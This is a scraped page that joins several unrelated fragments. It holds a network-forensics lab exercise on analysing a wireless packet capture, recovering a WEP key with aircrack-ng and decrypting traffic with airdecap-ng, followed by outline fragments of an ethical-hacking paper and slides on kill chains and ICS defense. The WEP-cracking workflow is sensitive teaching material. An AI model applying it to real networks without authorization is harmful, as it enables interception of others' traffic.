-T fileds -e wlan.sa -e wlan.da | sort | uniq -c
Week 10
c) For each unknown hardware address identified above, use tshark to identify the associated IP
address(es). Next, use a display filter that limits matched frames to those with each hardware address
as the sending station containing IP traffic. Next, display the source IP addresses. Then, run the same
tshark command but reverse the filters and indicated fields to reflect the destination hardware address
and IP address, respectively.
d) With what other systems did the IP address(es) you just identified communicate, and with what layer
four protocols?
Week 10
3) Check for subverting the DNS filter

Although not a primary focus of this investigation, the client's representative keeps asking you about
people getting around the filters they have in place through the Open DNS service. In particular, he is
interested to know whether anyone is able to access Facebook, which is against corporate policy. You ask if
determining whether there was any traffic containing DNS queries for Facebook would address his
concerns. He agrees that this approach would be sufficient to test his theory.
a) What Wireshark display filter can you use to identify any DNS queries for Facebook-related domains
quickly? How many DNS lookups did this filter match?
b) Do you think this finding sufficiently addresses whether users may be subverting the DNS filter
thoroughly?
Week 10
4) Identify weak encryption keys
We will attempt to decrypt the traffic from the protected WLANs better to address the client's question
about DNS subversion. Again, attacking the weakest link first is a reasonable approach. In this case, the
access point providing the Staff_Target_WLAN is the next in line. It uses WEP protection, which has long
been proven to be a trivially weak encryption standard.
Install Aircrack-ng software, which can examine live network traffic or a pcap file to determine if the
conditions are conducive to exploiting WEP's inherent weaknesses. If so, Aircrack-ng will provide the
WEP key.
a) Examine the command-line options for the "aircrack-ng" utility and then use it to attempt
identification of the WEP key in use. Write the command below and then identify the WEP key.
Reference the man-page if you are not familiar with Aircrack-ng's options.
This information shows two possible approaches to decrypting the WEP-protected traffic.
If the analytic workflow may include any pcap-aware tools than Wireshark, it would be most beneficial to
create a second copy of the source pcap file, but with all WEP-encrypted content replaced with its
corresponding decrypted equivalent. The Airdecap-ng software, also installed on your SIFT Workstation,
provides this functionality.
b) Examine the command-line options for the "airdecap-ng" utility and then use it with the key above to
create a working copy of the source pcap file with the WEP encryption removed. Write the command
you use below.
Week 10
5) Examine WEP-protected traffic

a) Now that you can examine the contents of the WEP-protected traffic, open the decrypted file in
Wireshark and re-apply the same DNS query filter you identified above.
(Note that airdecap-ng wrote as a new file named wireless-dec.pcap ).
How many results match the filter this time? For any results identified, what was the query and
response?
Week 10

CSS Master Draft

Uploaded by

Copyright:

Available Formats

CSS Master Draft

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CSS Master Draft

Uploaded by

Copyright:

Available Formats

Journal of Modern Technology and Engineering

Vol.8, No.3, 2023, pp.207-219

ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL

1 Collegeof Engineering, Computer Engineering Department, University of Mosul, Iraq

Keywords: Wireless Security, Ethical Hacking, IEEE 802.11, Performance Analysis

2.1 Wireless LANS Topology

• Infrastructure mode: A topology known as an infrastructure extends a wired LAN to

2.2 Wireless LAN Standard

• 802.11ac: The fifth version of WiFi is known as 802.11ac or WiFi 5. It is an improvement

• 802.11ax: The newest form of wireless technology is known as Wi-Fi 6. Compared to

4 802.11 Wireless LAN Security Features

1. Service set identifier (SSID): The use of an SSID connected to an AP or collection of

4.1 Security Schemes in WLANs

4.2 Ciphering Module of WPA3

4.3 Wireless Network Security Threats

5.1 Under Windows

Figure 1: Output of NetStumbelr

Figure 2: CommView for WiFi

Figure 4: Wireless network adapter installation

5.2 Under Linux

Figure 5: AiroWizard Capture with AP Key founded

Figure 6: Scanning for WLAN Networks

Figure 7: Capture of Back Track V2 after Finding the AP Key

6 Recommendations and Conclusions Remarks

2. Using a strong encryption protocol: Using a recent encryption protocol such as

the administrator password to be at least 8 characters with special symbols (such as #, $,

5. Reduce RF power transmission to the minimal level necessary: A common mea-

6. Use directional antennas: The propagation of RF signals can be difficult to control

8. Changing the encryption keys regularly: In order to prevent a compromised network

Intelligence-driven computer network defence

• Kill chain model – the basis of intelligence-driven computer network

• Kill chain analysis illustrates that the adversary must progress

Indicators and the indicator life cycle

• Three indicator types:

More on CVE: https://cve.mitre.org/

• Common computed indicators include hash values and regular

•“the intruder would initially use a backdoor which generated network

ICS Cyber kill chain model: Stage 1

ICS Cyber kill chain model: Stage 2

• ICS Security Architecture

ICS Security Architecture

• Separate corporate network from ICS network

• If the networks must be connected, only minimal (single if possible)

Network segmentation and segregation

• Operational risk analysis should be performed to determine critical

• Segmentation establishes security domains typically defined as

• Goal: Minimise access to sensitive information, ICS communication

Network segmentation and segregation

Network segmentation and segregation

• Logical network separation enforced by encryption or network

• Physical network separation to completely prevent any

• Network traffic filtering use a variety of technologies at various

• Deploy multiple layers of protection

• Redundancy in case a security measure fails

• Make the attacker’s life difficult!

Network segmentation and segregation - Defence in

Four common themes that implement the concept of defense-in-depth

1) Apply technologies at more than just the network layer.

2) Use the principles of least privilege and need‐to‐know.

3) Separate information and infrastructure based on security